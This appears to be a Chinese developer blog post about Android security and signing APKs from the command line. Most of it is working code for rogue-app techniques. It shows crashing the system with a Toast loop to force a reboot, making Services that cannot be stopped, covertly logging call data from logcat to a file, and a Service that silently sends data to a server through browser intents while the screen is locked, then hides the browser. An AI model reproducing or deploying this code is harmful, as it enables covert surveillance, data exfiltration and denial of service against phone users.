关于Android安全和通过命令给apk签名

最新推荐文章于 2022-10-18 18:44:23 发布
最新推荐文章于 2022-10-18 18:44:23 发布
阅读量141 收藏
点赞数
文章标签: 移动开发 开发工具 java
一,0权限重启手机:
现在我们来定义一个实现该功能的类: 

/** 
* 单击事件 
* @param view 
*/  
public void reboot(View view) {  
	Intent reboot = new Intent(Intent.ACTION_REBOOT);  
	reboot.putExtra("nowait", 1);  
	reboot.putExtra("interval", 1);  
	reboot.putExtra("window", 0);  
	sendBroadcast(reboot);  
}



程序异常终止了,logcat控制输出,说没有权限

我们需要了解一下重启手机需要什么样的权限

其中android:protectionLevel="signatureOrSystem"表明要只能是系统的程序或者签名和系统签名一样的程序才能够实现重启手机的功能. 我们就在清单文件里面,加上缺少的权限
<uses-permission android:name="android.permission.REBOOT"/>
但是程序还是出现同样的错误.
然而我们可以在把我们的程序提高成系统的权限(我们程序的uid和系统的等级一样)只需要这样配置:
android:sharedUserId="android.uid.system"
运行后发现如下错误:

[2012-02-12 22:51:26 - android_safe_reboot] Installation error: INSTALL_FAILED_SHARED_USER_INCOMPATIBLE
[2012-02-12 22:51:26 - android_safe_reboot] Please check logcat output for more details.
[2012-02-12 22:51:26 - android_safe_reboot] Launch canceled!

表示安装失败,因为我们虽然使用 android:sharedUserId="android.uid.system"但是我们程序的签名不是系统的签名,eclipse默认是debug签名.
所以现在我们的程序必须系统的签名,当然可以到网站去下载.(platform.pk8,platform.x509.pem)
现在我们要做的是程序使用系统的签名,那该怎么做呢?(需要签名打包工具signapk.jar,)
第一步,出eclipse的我们写的程序,在bin目录下就可以找到.
第二步,打开该apk把,把里面META-INF(包含的是一些默认签名的信息)的三个文件删除
第三步,使用signapk.jar命定进行签名打包.
E:\2\douban4\SignApk (1)\SignApk>java -jar signapk.jar platform.x509.pem platfor m.pk8 android_safe_reboot.apk(原pak) reboot.apk(新apk)
然后我们通过cmd命令把打包后的apk安装到模拟器上,出现如下错误:


因为模拟器上已经有了这样一个程序但是,他的签名是debug签名,我们知道唯一标识一个应用程序是包名和签名
只有两个程序的签名和包名一样,那么才表示这两个应用程序是同一类别的程序.
如一个应用程序要更新,那么就必须保持签名和包名一直,否则更新则不成功.
以包名和签名来标识一个程序,这样有什么好处?
如果仅以包名来标识,如果别人知道了你程序的包名,那么别人就可以也写一个另类的程序,但是和你的包名一样,用户一安装就把你的覆盖了.
综上所述,我们需要把模拟器上的这个程序卸载(adb uninstall 包名),然后我们再安装签名打包后的apk,启动程序,单击按钮,然后模拟器会出现如下情况因为是模拟器,它会一直停留在该界面,如果是真机就不会出现这样的情况.



但是,这样做比较麻烦.我们可以通过下面的方式来实现. 
    public void reboot(View view){ 
        // 利用吐司来重启手机 
       // system_server 
        while(true){
            Toast myToast = new Toast(this);
            myToast.setView(new View(this));
            myToast.show();
        }

    }

这段代码应该写到Service的子线程中,这样就不会阻塞用户的请求.

二 ,流氓软件是怎么打造不死之身的.
0权限程序开机启动,然后再次基础上打造程序的不死之身.
我们知道让我们的程序开机启动不需要配置任何权限,只需要编写一个广播即可.
要想用户无法停止程序的服务,我们可以通过两个Service来实现在第一个Service的onDestroy()方法里面启动第二个Service
在第二个Service的onDestroy()方法里面启动第一个Service,这样就无法停止程序的Service.
然后在广播里面,开机启动几个服务即可.
三,我们的隐私真的安全吗?
我们可以通过程序来监听用户开了什么网页,和谁打了电话等一切信息.
这就需要用到logcat了
logcat分为4个类别的日志信息:
Main /dev/log/main 这就是logcat控制台输出的日志信息
Events /dev/log/events 关于事件的日志信息
Radio /dev/log/radio 与网络通讯相关的日志
System /dev/log/system 与系统相关的日志信息
现在假设你已经配置好了android环境变量, adb logcat -b radio
然后我们通过DDMS给模拟器打电话(12121)

我们可以从中看到电话号码的踪迹,记录其他用户行为也是一样的.比如我们浏览一个网页就可以通过events事件.
现在我们可以来记录logcat日志信息.然后可以把我们想要的数据上传到服务器.
通过Service来把我们需要的日志写到文件里面 
通过Service来把我们需要的日志写到文件里面
try { 
                Process process = Runtime.getRuntime().exec("logcat -b radio");
                InputStream is = process.getInputStream();
                BufferedReader br = new BufferedReader(new InputStreamReader(is));
                //data/data 
                File file = new File(Environment.getExternalStorageDirectory(),"log.txt");
                FileOutputStream fos = new FileOutputStream(file);
                String result = null;

                while((result = br.readLine())!=null){
                    System.out.println(result);
                    fos.write(result.getBytes());
                    fos.flush();
                }

            } catch (Exception e) {
                e.printStackTrace();
            }

四, 0权限把数据上传到服务器,0权限从服务器下载数据
我们知道与互联网打交道需要使用internet权限.
我们可以模拟当用户锁屏的时候上传,当用户解锁的时候,即停止上传. 
public class UploadService extends Service {
private ScreenOFFBroadcastReciver sfReciver;
private ScreenONBroadcastReciver soReciver;
private KeyguardManager keyguardManager;
Handler handler;
@Override
public void onCreate() {
super.onCreate();
//关于键盘服务
keyguardManager = (KeyguardManager) getSystemService(KEYGUARD_SERVICE);
handler = new Handler();
soReciver = new ScreenONBroadcastReciver();
sfReciver = new ScreenOFFBroadcastReciver();
//这两个广播接受者所关心的广播 并注册这两个广播接受者
IntentFilter onIntentFilter = new IntentFilter(
"android.intent.action.SCREEN_ON");
registerReceiver(soReciver, onIntentFilter);
IntentFilter offIntentFilter = new IntentFilter(
"android.intent.action.SCREEN_OFF");
registerReceiver(sfReciver, offIntentFilter);
}
@Override
public IBinder onBind(Intent intent) {
	return null;
}
//屏幕锁定对应的广播
class ScreenOFFBroadcastReciver extends BroadcastReceiver {
@Override
public void onReceive(Context context, Intent intent) {
System.out.println("屏幕锁住");
// 500ms后开始执行上传数据
handler.postDelayed(r, 500);
}
}
//屏幕开启对应的广播
class ScreenONBroadcastReciver extends BroadcastReceiver {
@Override
public void onReceive(Context context, Intent intent) {
    System.out.println("屏幕开启");
    // 取消数据上传
    handler.removeCallbacks(r);
    //模拟home键
    Intent intent2 = new Intent(Intent.ACTION_MAIN);
    intent2.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);// 注意
    intent2.addCategory(Intent.CATEGORY_HOME);
    context.startActivity(intent2);
 }
}
private Runnable r = new Runnable() {
    @Override
    public void run() {
    // 如果是锁屏状态
    if (keyguardManager.inKeyguardRestrictedInputMode()) {
        // GET上传,内容随你
        String hackInfo = "http://192.168.1.247:8080/data.jsp?data="
            + new Random().nextFloat();
        Intent it = new Intent();
        it.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
        Uri uri = Uri.parse(hackInfo);
        it.setAction(Intent.ACTION_VIEW);
        it.setData(uri);
        startActivity(it);
        System.out.println("提交数据 " + hackInfo);
        // 每隔5秒,执行一次上传
        handler.postDelayed(r, 5000);
}
}
};
}
但是以上有一个问题,就是浏览器别启动了,如果用户去启动浏览器,发现浏览器已经被启动了.
0,权限上传数据到服务器,只需要通过get方式即可后面带上参数如,http://192.168.1.1:8080/dd.zip


通过命令给APK签名:

进入JDK安装目录如: C:\Program Files\Java\jdk1.6.0_10\bin
然后通过一下命令即可给未签名的apk签名了..
jarsigner -verbose -keystore xxx.keystore -signedjar out.apk in.apk xxx.keystore


有什么不足尽请读者批评指正.谢谢










iteye_3753
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
安卓adb和签名工具
12-01
包含adb.exe签名工具platform.x509.pem、platform.pk8、signapk.jar等
apk签名加密
solarsaber的专栏
09-10 1820
android apk 上线前加密和签名图文详解
adb命令 利用jks文件给apk签名
五个木
11-17 4996
程序猿日常实践是检验真理的唯一标准。 jarsigner -verbose -keystore xxx.jks -signedjar xxx.apk签名后的apk名字) xxx.apk(需要签名apk) xxx(keystore别名)
查看apk签名,查看key签名,adb常用命令
chenqiuping_ls的博客
12-29 3126
在使用第三方sdk时经常要求绑定签名,这里提供两种查看签名的方式,如果只是想查看一下手机上应用的签名,那么可以安装一个app直接输入包名即可查看该应用的签名,提供一个微信的签名查看apk,下载连接http://download.csdn.NET/detail/sapce_fish/9546282。 查看apk签名 方法一: 首先用解压软件解压出META-INF目录下
签名系统apk命令
jamikabin的专栏
01-11 555
java -jar out/host/linux-x86/framework/signapk.jar build/target/product/security/platform.x509.pem build/target/product/security/platform.pk8 input.apk output.apk
android实现给未签名apk签名方法
08-31
以下是使用`jarsigner`给未签名apk签名的步骤: 1. **创建Keystore文件**: 在开始签名之前,你需要创建一个keystore文件。这个文件包含了你的签名证书。可以使用`keytool`命令来生成keystore,例如: ``` ...
Windows版本 Android Apk签名工具
12-01
本篇将详细讲解Windows版本的Android Apk签名工具及其相关知识。 一、Android应用签名的重要性 Android系统要求每个发布到市场的APK文件都必须有一个数字证书签名。这个签名用于验证应用程序的开发者身份,确保应用...
Android 使用jarsigner给apk签名的方法详细介绍
01-21
Android 使用jarsigner给apk签名的方法详细介绍 工作中APP功能完成以后往往需要往应用商店提交一些内容,如商店中存在本公司别的人员提交的APP,往往需要进行认领,应用商店会让开发者下载空的APK,然后使用自己APP...
AndroidAPK签名工具之jarsigner和apksigner详解
08-27
主要给大家介绍了关于AndroidAPK签名工具之jarsigner和apksigner的相关资料,文中介绍的非常详细,对各位Android开发者们具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
android加密、签名相关
Wshiduo的博客
04-01 1013
此文重在思路梳理 加密方法部分: 代码加密方式—— SHA1: //SHA1 加密实例,info可以是keystore或jks文件中的内容 public static String encryptToSHA(String info) { byte[] digesta = null; try { // 得到一个SHA-1的消息摘要 MessageDig
adb脚本查看RSA、APKkeystore签名信息.bat
07-04
adb脚本,android批处理,用于批量处理android相关操作,用于批量自动化处理。用于批量测试,用于批量群控基础
android adb 签名工具,Android apk获得系统签名,(得到系统签名后)
weixin_39624367的博客
05-26 1010
Android apk获得系统签名,(得到系统签名后)对apk签名需要使用SignApk.jar和签名文件。可以使用Android源码获取,若没有源码,可以在这下载:SignApk.jar。(包含了SignApk.jar和签名文件和批处理文件)1 SignApk.jarSignApk.jar是安卓源码包中的一个签名工具,代码位于Android源码目录下的/build/tools/signapk/S...
Annotation详解
吃水煮鱼片的博客
01-18 466
Annotation
Androidapk进行系统签名
做有意思的事情
06-28 996
首先Android.xml加入这句 android:sharedUserId="android.uid.system" 然后需要找到系统组的人拿到签名证书文件:platform.pk8 和 platform.x509.pem,对该apk进行系统签名java -jar signapk.jar platform.x509.pem platform.pk8 Demo.apk signed.apk 其中:signapk.jar 是签名工具。 Demo.apk 是未签名apk signed.apk 是指定的
手动签名apk
yanjing的博客-- https://blog.yanjingtp.cn
07-28 404
jarsigner -verbose -keystore key绝对路径 -signedjar 生成的apk名字 需要签名apk 别名 -storepass 密码  
android adb 签名工具,怎么给Android应用程序签名
weixin_30768979的博客
05-26 633
Android系统要求所有的程序经过数字签名才能安装,如果没有可用的数字签名,系统将不许安装运行此程序。不管是模拟器还是真实手机。因此,在设备或者是模拟器上运行调试程序之前,必须为应用程序设置数字签名。所有的程序都必须签名,没有被签名的程序,系统将不能安装。可使用自签署证书签署应用程序,无须授权凭证。系统仅仅会在安装的时候测试签名证书的有效期,如果应用程序的签名是在安装之后才到期,那么应用程序仍然...
ADB命令大全(adb命令获取签名证书信息)
Justinbili的博客
10-18 3172
ADB命令大全(adb命令获取签名证书信息)
使用adb签名并安装Android程序
weixin_30906701的博客
05-25 158
首先需要准备Android SDK包,我是在windows上操作的,在PATH中配置 YOUT_SDK_PATH\android-sdk-windows\platform-tools 和 YOUT_SDK_PATH\android-sdk-windows\tools 这样就可以直接在命令行中使用adb和签名工具。 参考Android官网app签名页面,在cmd命令行中输入以...
Java.Core】注解 - Annotation
王晓斌的专栏
04-16 856
0. 多线程任务执行 大多数并发应用程序时围绕执行任务(task)进行管理的;所谓任务就是抽象的,离散的工作单元。 围绕执行任务来管理应用程序时,第一步是要指明一个清晰的任务边界。大多数应用服务器程序都选择了下面这个自然的任务辩解:单独的客户请求; 任务时逻辑上的单元; 任务 Runnable 表示一个任务单元(java.lang) public interface Runnabl
android apk签名
最新发布
07-27
v4方案是在Android 11.0引入的APK签名方案,提供了更多的功能和安全性。 要对APK进行签名,可以使用命令行工具或者使用Android开发工具包(SDK)提供的工具。一个常见的签名操作是使用Java命令行工具执行签名操作,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值